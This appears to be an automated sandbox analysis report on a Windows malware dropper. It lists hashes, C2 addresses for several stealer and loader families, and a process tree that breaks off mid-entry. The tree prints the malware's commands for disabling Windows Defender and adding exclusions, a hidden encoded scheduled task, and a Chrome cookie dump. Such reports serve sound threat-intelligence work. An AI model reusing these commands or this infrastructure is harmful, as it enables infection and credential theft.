Analysis

  • max time kernel
    59s
  • max time network
    172s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    20/12/2021, 14:02

General

  • Target

    99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe

  • Size

    7.0MB

  • MD5

    27ee0fff858ebb65e9d645b3890418f9

  • SHA1

    78cce78871932c34b30a16296063ee1ca6c152e5

  • SHA256

    99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa

  • SHA512

    193f9dca9b3a7f26b7e0222d784e2f88f76743141c51917ba4dc4232ba1e2205b9fa53762c55926f53ea9c37670d121ab971e77ed0e33641db51ee355737ef05

Malware Config

Extracted

  • Family
    socelars
  • C2
    http://www.biohazardgraphics.com/

Extracted

  • Family
    vidar
  • Version
    49.1
  • Botnet
    915
  • C2
    https://noc.social/@sergeev46
    https://c.im/@sergeev47
  • Attributes
    • profile_id
      915

Extracted

  • Family
    smokeloader
  • Version
    2020
  • C2
    http://rcacademy.at/upload/
    http://e-lanpengeonline.com/upload/
    http://vjcmvz.cn/upload/
    http://galala.ru/upload/
    http://witra.ru/upload/
  • rc4.i32
  • rc4.i32

Extracted

  • Family
    redline
  • Botnet
    v3user1
  • C2
    159.69.246.184:13127

Signatures

  • Modifies Windows Defender Real-time Protection settings (3 TTPs)
  • Process spawned unexpected child process (1 IoC)

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload (5 IoCs)
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload (2 IoCs)
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • NirSoft WebBrowserPassView (2 IoCs)

    Password recovery tool for various web browsers.

  • Nirsoft (5 IoCs)
  • Vidar Stealer (3 IoCs)
  • ASPack v2.12-2.42 (6 IoCs)

    Detects executables packed with ASPack v2.12-2.42.

  • Downloads MZ/PE file
  • Executes dropped EXE (33 IoCs)
  • Loads dropped DLL (11 IoCs)
  • Reads user/profile data of web browsers (2 TTPs)

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
  • Adds Run key to start application (2 TTPs, 1 IoC)
  • Checks installed software on the system (1 TTP)

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 (1 TTP)
  • Looks up external IP address via web service (5 IoCs)

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  • Suspicious use of SetThreadContext (3 IoCs)
  • Drops file in Program Files directory (3 IoCs)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) (3 TTPs, 3 IoCs)

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) (1 TTP, 3 IoCs)

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill (5 IoCs)
  • Script User-Agent (1 IoC)

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses (64 IoCs)
  • Suspicious behavior: MapViewOfSection (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (64 IoCs)
  • Suspicious use of FindShellTrayWindow (1 IoC)
  • Suspicious use of WriteProcessMemory (64 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe
    "C:\Users\Admin\AppData\Local\Temp\99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2720
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3036
      • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3956
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1304
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1056
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3964
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:988
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sun10467c5b95.exe
          4⤵
          PID:448
          • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10467c5b95.exe
            Sun10467c5b95.exe
            5⤵
            • Executes dropped EXE
            PID:1680
            • C:\Users\Admin\Pictures\Adobe Films\EXSNwvbiYOmfXKGKgs3Ku6Pi.exe
              "C:\Users\Admin\Pictures\Adobe Films\EXSNwvbiYOmfXKGKgs3Ku6Pi.exe"
              6⤵
              PID:4800
            • C:\Users\Admin\Pictures\Adobe Films\q5I2dJJV6kK7x8RRCnHC1M9e.exe
              "C:\Users\Admin\Pictures\Adobe Films\q5I2dJJV6kK7x8RRCnHC1M9e.exe"
              6⤵
              PID:2368
            • C:\Users\Admin\Pictures\Adobe Films\0OppErD0bsEo_NalHxGugaq5.exe
              "C:\Users\Admin\Pictures\Adobe Films\0OppErD0bsEo_NalHxGugaq5.exe"
              6⤵
              PID:2800
              • C:\Users\Admin\AppData\Local\a876bd7a-f3c2-453b-86cd-ac22b22e468e.exe
                "C:\Users\Admin\AppData\Local\a876bd7a-f3c2-453b-86cd-ac22b22e468e.exe"
                7⤵
                PID:5224
              • C:\Users\Admin\AppData\Local\8f4f023a-1e19-4b03-8c88-6390a95e1642.exe
                "C:\Users\Admin\AppData\Local\8f4f023a-1e19-4b03-8c88-6390a95e1642.exe"
                7⤵
                PID:2144
              • C:\Users\Admin\AppData\Local\5c6c344d-d780-416b-bc74-d1aa11f14a27.exe
                "C:\Users\Admin\AppData\Local\5c6c344d-d780-416b-bc74-d1aa11f14a27.exe"
                7⤵
                PID:4336
            • C:\Users\Admin\Pictures\Adobe Films\PnthudFnJxDTaFR6hCSUQSRL.exe
              "C:\Users\Admin\Pictures\Adobe Films\PnthudFnJxDTaFR6hCSUQSRL.exe"
              6⤵
              PID:1864
              • C:\Users\Admin\AppData\Local\Temp\OneCleanerInst813932.exe
                "C:\Users\Admin\AppData\Local\Temp\OneCleanerInst813932.exe"
                7⤵
                PID:5500
              • C:\Users\Admin\AppData\Local\Temp\zhangting.exe
                "C:\Users\Admin\AppData\Local\Temp\zhangting.exe"
                7⤵
                PID:5516
                • C:\Users\Admin\AppData\Local\Temp\zhangting.exe
                  "C:\Users\Admin\AppData\Local\Temp\zhangting.exe" -u
                  8⤵
                  PID:3988
              • C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe
                "C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe"
                7⤵
                PID:4852
              • C:\Users\Admin\AppData\Local\Temp\inst.exe
                "C:\Users\Admin\AppData\Local\Temp\inst.exe"
                7⤵
                PID:4352
              • C:\Users\Admin\AppData\Local\Temp\setup.exe
                "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                7⤵
                PID:4452
              • C:\Users\Admin\AppData\Local\Temp\setup1.exe
                "C:\Users\Admin\AppData\Local\Temp\setup1.exe"
                7⤵
                PID:4612
              • C:\Users\Admin\AppData\Local\Temp\racoon.exe
                "C:\Users\Admin\AppData\Local\Temp\racoon.exe"
                7⤵
                PID:4928
              • C:\Users\Admin\AppData\Local\Temp\askhelp.exe
                "C:\Users\Admin\AppData\Local\Temp\askhelp.exe"
                7⤵
                PID:4340
              • C:\Users\Admin\AppData\Local\Temp\chrome update.exe
                "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
                7⤵
                PID:5820
              • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                7⤵
                PID:4652
              • C:\Users\Admin\AppData\Local\Temp\logger.exe
                "C:\Users\Admin\AppData\Local\Temp\logger.exe"
                7⤵
                PID:3936
              • C:\Users\Admin\AppData\Local\Temp\chrome.exe
                "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
                7⤵
                PID:1588
              • C:\Users\Admin\AppData\Local\Temp\chrome1.exe
                "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
                7⤵
                PID:6024
              • C:\Users\Admin\AppData\Local\Temp\chrome2.exe
                "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
                7⤵
                PID:5280
            • C:\Users\Admin\Pictures\Adobe Films\jzRNmT8ActwBJx4V0KWBqBSU.exe
              "C:\Users\Admin\Pictures\Adobe Films\jzRNmT8ActwBJx4V0KWBqBSU.exe"
              6⤵
              PID:5192
              • C:\Users\Admin\Pictures\Adobe Films\jzRNmT8ActwBJx4V0KWBqBSU.exe
                "C:\Users\Admin\Pictures\Adobe Films\jzRNmT8ActwBJx4V0KWBqBSU.exe"
                7⤵
                PID:5388
            • C:\Users\Admin\Pictures\Adobe Films\4ePcItbOIFBNfJJYafOyxx5O.exe
              "C:\Users\Admin\Pictures\Adobe Films\4ePcItbOIFBNfJJYafOyxx5O.exe"
              6⤵
              PID:5176
              • C:\Users\Admin\AppData\Local\Temp\7zSB107.tmp\Install.exe
                .\Install.exe
                7⤵
                PID:3840
                • C:\Users\Admin\AppData\Local\Temp\7zSD326.tmp\Install.exe
                  .\Install.exe /S /site_id "525403"
                  8⤵
                  PID:5792
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                    9⤵
                    PID:5076
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                      10⤵
                      PID:1152
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                        11⤵
                        PID:5456
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                    9⤵
                    PID:2412
                    • C:\Windows\SysWOW64\cmd.exe
                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                      10⤵
                      PID:4456
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                    9⤵
                    PID:4636
                    • C:\Windows\SysWOW64\cmd.exe
                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                      10⤵
                      PID:5864
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /CREATE /TN "gYpzmTZDv" /SC once /ST 00:56:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                    9⤵
                    • Creates scheduled task(s)
                    PID:2196
            • C:\Users\Admin\Pictures\Adobe Films\lvvsSK9BoV7bBxpQm39J8vYU.exe
              "C:\Users\Admin\Pictures\Adobe Films\lvvsSK9BoV7bBxpQm39J8vYU.exe"
              6⤵
              PID:5356
              • C:\Users\Admin\Pictures\Adobe Films\lvvsSK9BoV7bBxpQm39J8vYU.exe
                "C:\Users\Admin\Pictures\Adobe Films\lvvsSK9BoV7bBxpQm39J8vYU.exe"
                7⤵
                PID:4404
            • C:\Users\Admin\Pictures\Adobe Films\0pLeABNB_2OGcWGTckrKLPxb.exe
              "C:\Users\Admin\Pictures\Adobe Films\0pLeABNB_2OGcWGTckrKLPxb.exe"
              6⤵
              PID:5492
              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                7⤵
                PID:5684
              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                7⤵
                PID:3664
            • C:\Users\Admin\Pictures\Adobe Films\Gbj64GgjHOmgsLq9f2vD2Def.exe
              "C:\Users\Admin\Pictures\Adobe Films\Gbj64GgjHOmgsLq9f2vD2Def.exe"
              6⤵
              PID:5588
            • C:\Users\Admin\Pictures\Adobe Films\eeUsra3KO3F8pRjymnsB0nXP.exe
              "C:\Users\Admin\Pictures\Adobe Films\eeUsra3KO3F8pRjymnsB0nXP.exe"
              6⤵
              PID:5708
            • C:\Users\Admin\Pictures\Adobe Films\y6BrMPmK5ph61VVOpJvALchW.exe
              "C:\Users\Admin\Pictures\Adobe Films\y6BrMPmK5ph61VVOpJvALchW.exe"
              6⤵
              PID:5348
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                7⤵
                PID:5260
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                7⤵
                PID:6180
            • C:\Users\Admin\Pictures\Adobe Films\sqwQeI1eYHHnuOLtHzZ2ML0_.exe
              "C:\Users\Admin\Pictures\Adobe Films\sqwQeI1eYHHnuOLtHzZ2ML0_.exe"
              6⤵
              PID:5812
            • C:\Users\Admin\Pictures\Adobe Films\fK9g8eZ9t6yVzxfwet1amDUU.exe
              "C:\Users\Admin\Pictures\Adobe Films\fK9g8eZ9t6yVzxfwet1amDUU.exe"
              6⤵
              PID:5880
            • C:\Users\Admin\Pictures\Adobe Films\2E100bKotanh9fLG2KBQfsFN.exe
              "C:\Users\Admin\Pictures\Adobe Films\2E100bKotanh9fLG2KBQfsFN.exe"
              6⤵
              PID:5932
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im chrome.exe
                7⤵
                PID:4192
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im chrome.exe
                  8⤵
                  • Kills process with taskkill
                  PID:4948
            • C:\Users\Admin\Pictures\Adobe Films\HjLCibFOi2YJXX4_J1Ao_Lnc.exe
              "C:\Users\Admin\Pictures\Adobe Films\HjLCibFOi2YJXX4_J1Ao_Lnc.exe"
              6⤵
              PID:5872
            • C:\Users\Admin\Pictures\Adobe Films\1j_af0aQ1vhAfBBQxi9h3oZE.exe
              "C:\Users\Admin\Pictures\Adobe Films\1j_af0aQ1vhAfBBQxi9h3oZE.exe"
              6⤵
              PID:5144
            • C:\Users\Admin\Pictures\Adobe Films\CEzFZCZOex2S8chk5mYyOsMe.exe
              "C:\Users\Admin\Pictures\Adobe Films\CEzFZCZOex2S8chk5mYyOsMe.exe"
              6⤵
              PID:4788
            • C:\Users\Admin\Pictures\Adobe Films\3pyvDF5BcyhBADQASRHdE_kU.exe
              "C:\Users\Admin\Pictures\Adobe Films\3pyvDF5BcyhBADQASRHdE_kU.exe"
              6⤵
              PID:3576
              • C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
                "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
                7⤵
                PID:5740
            • C:\Users\Admin\Pictures\Adobe Films\gJvKZNOeZzxVnAeqDvQvn9WO.exe
              "C:\Users\Admin\Pictures\Adobe Films\gJvKZNOeZzxVnAeqDvQvn9WO.exe"
              6⤵
              PID:3168
            • C:\Users\Admin\Pictures\Adobe Films\2DYQvtIh3ce8724on5V09oIc.exe
              "C:\Users\Admin\Pictures\Adobe Films\2DYQvtIh3ce8724on5V09oIc.exe"
              6⤵
              PID:740
            • C:\Users\Admin\Pictures\Adobe Films\Vkki9EWhRfFG3swXd2uwRJKl.exe
              "C:\Users\Admin\Pictures\Adobe Films\Vkki9EWhRfFG3swXd2uwRJKl.exe"
              6⤵
              PID:2220
            • C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe
              "C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe"
              6⤵
                                                                                                                                  PID:1168
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\q7eIVhHVwNzS8Z03T3qBYNfn.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\q7eIVhHVwNzS8Z03T3qBYNfn.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:644
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\nGGzH035fd28Rex9K2YjI1D8.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\nGGzH035fd28Rex9K2YjI1D8.exe"
                                                                                                                                    6⤵
                                                                                                                                      PID:5048
                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\6VKDl7znAfYnyGKVQb1ZkqIH.exe
                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\6VKDl7znAfYnyGKVQb1ZkqIH.exe"
                                                                                                                                      6⤵
                                                                                                                                        PID:3248
                                                                                                                                        • C:\Users\Admin\Documents\uIrgCCwCkXNkltWaSsazxtRg.exe
                                                                                                                                          "C:\Users\Admin\Documents\uIrgCCwCkXNkltWaSsazxtRg.exe"
                                                                                                                                          7⤵
                                                                                                                                            PID:6148
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                            7⤵
                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                            PID:6200
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                            7⤵
                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                            PID:6192
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\i0K_H6Cs2RJCTWPiOUYD37pl.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\i0K_H6Cs2RJCTWPiOUYD37pl.exe"
                                                                                                                                          6⤵
                                                                                                                                            PID:2400
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\vH3tKOl06Wfs5SENTRp7envA.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\vH3tKOl06Wfs5SENTRp7envA.exe"
                                                                                                                                            6⤵
                                                                                                                                              PID:5720
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\kFJFPA7cj6Dr2QL7L7i0pE1P.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\kFJFPA7cj6Dr2QL7L7i0pE1P.exe"
                                                                                                                                              6⤵
                                                                                                                                                PID:2512
                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\yCEgBJRApotvw9FnwRTSEAcH.exe
                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\yCEgBJRApotvw9FnwRTSEAcH.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:3988
                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\yCEgBJRApotvw9FnwRTSEAcH.exe
                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\yCEgBJRApotvw9FnwRTSEAcH.exe" -u
                                                                                                                                                    7⤵
                                                                                                                                                      PID:920
                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\rbywTHqSWbLrOQInar2AKrbZ.exe
                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\rbywTHqSWbLrOQInar2AKrbZ.exe"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:1320
                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\rbywTHqSWbLrOQInar2AKrbZ.exe
                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\rbywTHqSWbLrOQInar2AKrbZ.exe" -u
                                                                                                                                                        7⤵
                                                                                                                                                          PID:2092
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c Sun108e4051ef0.exe
                                                                                                                                                    4⤵
                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                    PID:784
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun108e4051ef0.exe
                                                                                                                                                      Sun108e4051ef0.exe
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:3708
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c Sun10d73b7785b.exe
                                                                                                                                                    4⤵
                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                    PID:1712
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10d73b7785b.exe
                                                                                                                                                      Sun10d73b7785b.exe
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:628
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im Sun10d73b7785b.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10d73b7785b.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                        6⤵
                                                                                                                                                          PID:4600
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            taskkill /im Sun10d73b7785b.exe /f
                                                                                                                                                            7⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:4752
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c Sun1074b86ebb831862.exe
                                                                                                                                                      4⤵
                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                      PID:2876
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1074b86ebb831862.exe
                                                                                                                                                        Sun1074b86ebb831862.exe
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:3700
                                                                                                                                                        • C:\Windows\SysWOW64\control.exe
                                                                                                                                                          "C:\Windows\System32\control.exe" .\2c3M8M5c.RJ
                                                                                                                                                          6⤵
                                                                                                                                                            PID:3052
                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\2c3M8M5c.RJ
                                                                                                                                                              7⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              PID:1064
                                                                                                                                                              • C:\Windows\system32\RunDll32.exe
                                                                                                                                                                C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\2c3M8M5c.RJ
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:5992
                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\2c3M8M5c.RJ
                                                                                                                                                                    9⤵
                                                                                                                                                                      PID:2456
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c Sun1050791613c996ff.exe
                                                                                                                                                            4⤵
                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                            PID:4080
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c Sun10aa9ae1c57b995f.exe
                                                                                                                                                            4⤵
                                                                                                                                                              PID:3376
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10aa9ae1c57b995f.exe
                                                                                                                                                                Sun10aa9ae1c57b995f.exe
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:1516
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10aa9ae1c57b995f.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10aa9ae1c57b995f.exe
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:4104
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c Sun10df2d13b8e171d6f.exe
                                                                                                                                                              4⤵
                                                                                                                                                                PID:1088
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10df2d13b8e171d6f.exe
                                                                                                                                                                  Sun10df2d13b8e171d6f.exe
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:2096
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:4924
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                                                        7⤵
                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                        PID:4396
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Sun10ee0af6c65e215a.exe
        4⤵
        PID:2364
        • C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10ee0af6c65e215a.exe
